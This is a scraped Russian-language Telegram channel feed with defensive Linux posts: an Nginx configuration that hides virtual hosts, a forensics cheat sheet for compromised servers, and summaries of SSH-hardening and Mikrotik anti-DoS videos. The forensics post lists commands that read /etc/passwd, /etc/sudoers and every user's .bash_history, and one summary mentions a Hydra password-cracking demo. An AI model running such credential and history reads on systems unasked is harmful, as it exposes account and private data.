Привет, страж безопасности!
Заметил, что при обращении к серверу по IP адресу Nginx показывает первый попавшийся сайт? Это палит все твои виртуальные хосты. Сейчас покажу элегантное решение, о котором знают немногие.
📌 Стандартная заглушка для HTTP:
С HTTP всё просто. А вот с HTTPS начинаются танцы с бубном...
🔧 Проблема HTTPS:
Без сертификата Nginx использует сертификат первого виртуального хоста. Пользователь видит:
- Предупреждение о несоответствии домена
- Реальное имя твоего сайта в сертификате 😱
💭 Старое решение — сертификат-пустышка:
Домены скрыты, но предупреждение о сертификате остаётся...
🚀 Новое решение — ssl_reject_handshake:
💡 Что происходит:
- Никаких предупреждений о сертификатах
- Мгновенная ошибка соединения
- Полная анонимность виртуальных хостов
Теперь любопытные не узнают, какие сайты крутятся на твоём сервере!
____________________
Дополнительный материал:
🧠 - Linux для продвинутых: Как проверить, использует ли ваша система systemd?
🧠 - Linux Deep Dive: PID 1 и его детище - systemd
🧠 - Linux Command Mastery: Управление службами с помощью systemd
#Linux_Mastery #nginx #webserver #security #ssl #DevOps #angie
Привет, страж безопасности!
Заметил, что при обращении к серверу по IP адресу Nginx показывает первый попавшийся сайт? Это палит все твои виртуальные хосты. Сейчас покажу элегантное решение, о котором знают немногие.
📌 Стандартная заглушка для HTTP:
server {
listen 80 default_server;
server_name _;
return 404;
}
С HTTP всё просто. А вот с HTTPS начинаются танцы с бубном...
🔧 Проблема HTTPS:
Без сертификата Nginx использует сертификат первого виртуального хоста. Пользователь видит:
- Предупреждение о несоответствии домена
- Реальное имя твоего сайта в сертификате 😱
💭 Старое решение — сертификат-пустышка:
# Генерируем самоподписанный сертификат
openssl req -x509 -nodes -days 3650 -newkey rsa:2048 \
-keyout /etc/nginx/certs/nginx.key \
-out /etc/nginx/certs/nginx.crt
server {
listen 443 ssl default_server;
server_name _;
ssl_certificate /etc/nginx/certs/nginx.crt;
ssl_certificate_key /etc/nginx/certs/nginx.key;
return 404;
}
Домены скрыты, но предупреждение о сертификате остаётся...
🚀 Новое решение — ssl_reject_handshake:
server {
listen 80 default_server;
listen 443 ssl default_server;
server_name _;
ssl_reject_handshake on;
return 404;
}
💡 Что происходит:
ssl_reject_handshake on
отклоняет SSL-соединение на уровне handshake, если запрос не соответствует server_name
. Результат:- Никаких предупреждений о сертификатах
- Мгновенная ошибка соединения
- Полная анонимность виртуальных хостов
Теперь любопытные не узнают, какие сайты крутятся на твоём сервере!
____________________
Дополнительный материал:
🧠 - Linux для продвинутых: Как проверить, использует ли ваша система systemd?
🧠 - Linux Deep Dive: PID 1 и его детище - systemd
🧠 - Linux Command Mastery: Управление службами с помощью systemd
#Linux_Mastery #nginx #webserver #security #ssl #DevOps #angie
Telegram
Linux Skill - Освой Linux c нуля до DevOps
🐧🔧 "Linux для продвинутых: Как проверить, использует ли ваша система systemd?" 🕵️♂️💡
Привет, линуксоиды и системные маги! Сегодня мы погрузимся в увлекательный мир управления службами и разберемся, как проверить, использует ли ваш дистрибутив Linux систему…
Привет, линуксоиды и системные маги! Сегодня мы погрузимся в увлекательный мир управления службами и разберемся, как проверить, использует ли ваш дистрибутив Linux систему…
👍17👀2
🚨 Взломали сервер? 10 команд для поиска следов хакера
Привет, кибер-детектив!
Подозреваешь, что сервер скомпрометирован? Держи шпаргалку из топового выступления по Linux Forensics. Это реальные команды, которые используют профи при расследовании инцидентов.
🔍 10 команд для быстрого анализа:
📌 Где искать артефакты взлома:
🖥️ Система:
-
-
-
-
📝 Логи (/var/log/):
-
-
-
-
🔐 Закрепление в системе:
🌐 Сеть:
-
-
-
👤 Пользователи:
💾 Временные директории (любимые места хакеров):
-
-
-
💡 Про-совет:
Сохрани все метки времени для форензики:
🚀 Быстрая проверка:
1. Смотри процессы и порты
2. Проверяй cron и systemd
3. Изучай историю команд
4. Ищи свежие файлы в /tmp
Помни: хакеры часто оставляют следы в самых очевидных местах!
____________________
Дополнительный материал:
🧠 - Linux Systemd SOS: Как остановить неисправные процессы
🧠 - Linux Systemd: Навигация по уровням запуска и целям
🧠 - История Shadow Password Suite: Революция безопасности паролей в Linux от Джулианной Фрэнсис Хо
#security #forensics #Linux #incident #DevOps #hacking
Привет, кибер-детектив!
Подозреваешь, что сервер скомпрометирован? Держи шпаргалку из топового выступления по Linux Forensics. Это реальные команды, которые используют профи при расследовании инцидентов.
🔍 10 команд для быстрого анализа:
# Древо процессов — ищем подозрительное
ps auxwf
# Открытые порты (plunto = PLease UNTo)
ss -tupln
netstat -plunto
# История входов — кто и когда заходил
last -Faiwx
# Свежие изменения файлов за 2 дня
find / -mtime -2 -ls
# Открытые файлы прямо сейчас
lsof -V
# Файлы по времени изменения
ls -lta
# Детальная инфа о файле
stat <file>
📌 Где искать артефакты взлома:
🖥️ Система:
-
/proc/version
— версия ядра-
/proc/mounts
— что примонтировано-
/proc/[PID]/cmdline
— с чем запущен процесс-
/etc/localtime
— проверяем время (хакеры меняют!)📝 Логи (/var/log/):
-
auth.log
/ secure
— попытки входа-
btmp
— неудачные логины-
wtmp
— все входы/выходы-
apt/history.log
— что устанавливали🔐 Закрепление в системе:
# Cron задания — любимое место хакеров
ls -la /etc/cron.*
cat /var/spool/cron/*
# Автозагрузка служб
ls -la /etc/systemd/system/
ls -la /lib/systemd/system/
# История команд (проверь у всех юзеров!)
cat /home/*/.bash_history
cat /root/.bash_history
🌐 Сеть:
-
/etc/network/interfaces
-
/var/lib/NetworkManager/*.lease
-
/etc/sysconfig/iptables
👤 Пользователи:
# Новые или изменённые аккаунты
cat /etc/passwd
cat /etc/sudoers
ls -la /etc/sudoers.d/
💾 Временные директории (любимые места хакеров):
-
/tmp
-
/var/tmp
-
/dev/shm
💡 Про-совет:
Сохрани все метки времени для форензики:
find / -xdev -print0 | xargs -0 stat --printf="%i,%n,%x,%y,%z,%U,%G,%A,%s\n" > timestamps.dat
🚀 Быстрая проверка:
1. Смотри процессы и порты
2. Проверяй cron и systemd
3. Изучай историю команд
4. Ищи свежие файлы в /tmp
Помни: хакеры часто оставляют следы в самых очевидных местах!
____________________
Дополнительный материал:
🧠 - Linux Systemd SOS: Как остановить неисправные процессы
🧠 - Linux Systemd: Навигация по уровням запуска и целям
🧠 - История Shadow Password Suite: Революция безопасности паролей в Linux от Джулианной Фрэнсис Хо
#security #forensics #Linux #incident #DevOps #hacking
Telegram
Linux Skill - Освой Linux c нуля до DevOps
🚨🐧 "Linux Systemd SOS: Как остановить неисправные процессы" 🛠️🆘
Привет, герои системного администрирования и спасители зависших процессов! Сегодня мы погрузимся в мир systemd, чтобы научиться останавливать неисправные процессы, которые могут вызвать хаос…
Привет, герои системного администрирования и спасители зависших процессов! Сегодня мы погрузимся в мир systemd, чтобы научиться останавливать неисправные процессы, которые могут вызвать хаос…
👍27🔥3
Media is too big
VIEW IN TELEGRAM
🚨 VPS взломали за 2 минуты? Защищаем SSH правильно
Привет, защитник серверов!
Тысячи попыток брутфорса в логах? Автор показывает комплексную защиту SSH: от смены порта до двухфакторной аутентификации. Хакеры останутся ни с чем!
📹 План защиты (таймкоды):
00:00 — Анализ угроз SSH
00:43 — Смотрим логи атак и TCPdump
01:34 — Создаём нового пользователя вместо root
03:01 — Настраиваем SSH-ключи
06:17 — Демо: как ломают пароли через Hydra
09:08 — Включаем Google Authenticator (2FA)
12:15 — Проверяем защиту
💡 Что получаем:
- ✅ Невидимость для сканеров портов
- ✅ Защита от брутфорса паролей
- ✅ Двойная защита: ключ + код из приложения
- ✅ Root заблокирован навсегда
🚀 Инструменты из видео:
- TCPdump — ловим сканирование
- Nmap — проверяем открытые порты
- Hydra — демо атаки на пароли
- Google Authenticator — 2FA защита
Смотри видео и защити свой сервер уже сегодня!
🌐 Источник: YouTube
____________________
Дополнительный материал:
🧠 - Удаление пользователя в Linux с помощью команды userdel: Пошаговое руководство
🧠 - Удаление пользователя в Ubuntu с помощью команды deluser: Пошаговое руководство
🧠 - Удаление группы в Ubuntu с помощью команды delgroup: Пошаговое руководство
#Linux_youtube #ssh #security #2fa #vps #Linux #video
Привет, защитник серверов!
Тысячи попыток брутфорса в логах? Автор показывает комплексную защиту SSH: от смены порта до двухфакторной аутентификации. Хакеры останутся ни с чем!
📹 План защиты (таймкоды):
00:00 — Анализ угроз SSH
00:43 — Смотрим логи атак и TCPdump
01:34 — Создаём нового пользователя вместо root
03:01 — Настраиваем SSH-ключи
06:17 — Демо: как ломают пароли через Hydra
09:08 — Включаем Google Authenticator (2FA)
12:15 — Проверяем защиту
💡 Что получаем:
- ✅ Невидимость для сканеров портов
- ✅ Защита от брутфорса паролей
- ✅ Двойная защита: ключ + код из приложения
- ✅ Root заблокирован навсегда
🚀 Инструменты из видео:
- TCPdump — ловим сканирование
- Nmap — проверяем открытые порты
- Hydra — демо атаки на пароли
- Google Authenticator — 2FA защита
Смотри видео и защити свой сервер уже сегодня!
🌐 Источник: YouTube
____________________
Дополнительный материал:
🧠 - Удаление пользователя в Linux с помощью команды userdel: Пошаговое руководство
🧠 - Удаление пользователя в Ubuntu с помощью команды deluser: Пошаговое руководство
🧠 - Удаление группы в Ubuntu с помощью команды delgroup: Пошаговое руководство
#Linux_youtube #ssh #security #2fa #vps #Linux #video
👍7
Media is too big
VIEW IN TELEGRAM
💥 100% CPU от DDoS? Решение в правилах Mikrotik
Привет, защитник инфраструктуры!
ServerFlow показывает реальную DOS-атаку на сервер и пошагово настраивает автоматическую защиту через Mikrotik. От детекции до блокировки за 20 минут!
📹 Структура видео (таймкоды):
00:00 — Что такое DOS и DDoS
00:47 — Демо реальной атаки на сервер
03:37 — Последствия: 100% CPU и сети
05:44 — Детекция через Torch
07:17 — Ручная блокировка IP
09:27 — Автоматизация через firewall
11:42 — Настройка лимитов соединений
13:35 — Правильная последовательность правил
16:23 — Тестирование защиты
18:14 — Ограничения метода
💡 Что получаем:
- Автоматическое обнаружение атакующих
- Блокировка на уровне firewall (до CPU)
- Временный бан на 1 час
- Защита от простых DOS-атак
⚠️ Важно:
Mikrotik поможет от небольших атак, но не спасёт от мощного DDoS. Для серьёзной защиты нужен дата-центр с антиDDoS.
🌐 Источник: YouTube - ServerFlow
____________________
Дополнительный материал:
🧠 - Поиск и управление файлами удаленных пользователей в Linux: Пошаговое руководство
🧠 - Получение привилегий root в Linux с помощью команды su: Пошаговое руководство
🧠 - Расширение возможностей команды sudo в Linux: Пошаговое руководство
#Linux_youtube #mikrotik #ddos #firewall #security #network #video
Привет, защитник инфраструктуры!
ServerFlow показывает реальную DOS-атаку на сервер и пошагово настраивает автоматическую защиту через Mikrotik. От детекции до блокировки за 20 минут!
📹 Структура видео (таймкоды):
00:00 — Что такое DOS и DDoS
00:47 — Демо реальной атаки на сервер
03:37 — Последствия: 100% CPU и сети
05:44 — Детекция через Torch
07:17 — Ручная блокировка IP
09:27 — Автоматизация через firewall
11:42 — Настройка лимитов соединений
13:35 — Правильная последовательность правил
16:23 — Тестирование защиты
18:14 — Ограничения метода
💡 Что получаем:
- Автоматическое обнаружение атакующих
- Блокировка на уровне firewall (до CPU)
- Временный бан на 1 час
- Защита от простых DOS-атак
⚠️ Важно:
Mikrotik поможет от небольших атак, но не спасёт от мощного DDoS. Для серьёзной защиты нужен дата-центр с антиDDoS.
🌐 Источник: YouTube - ServerFlow
____________________
Дополнительный материал:
🧠 - Поиск и управление файлами удаленных пользователей в Linux: Пошаговое руководство
🧠 - Получение привилегий root в Linux с помощью команды su: Пошаговое руководство
🧠 - Расширение возможностей команды sudo в Linux: Пошаговое руководство
#Linux_youtube #mikrotik #ddos #firewall #security #network #video
👍1👀1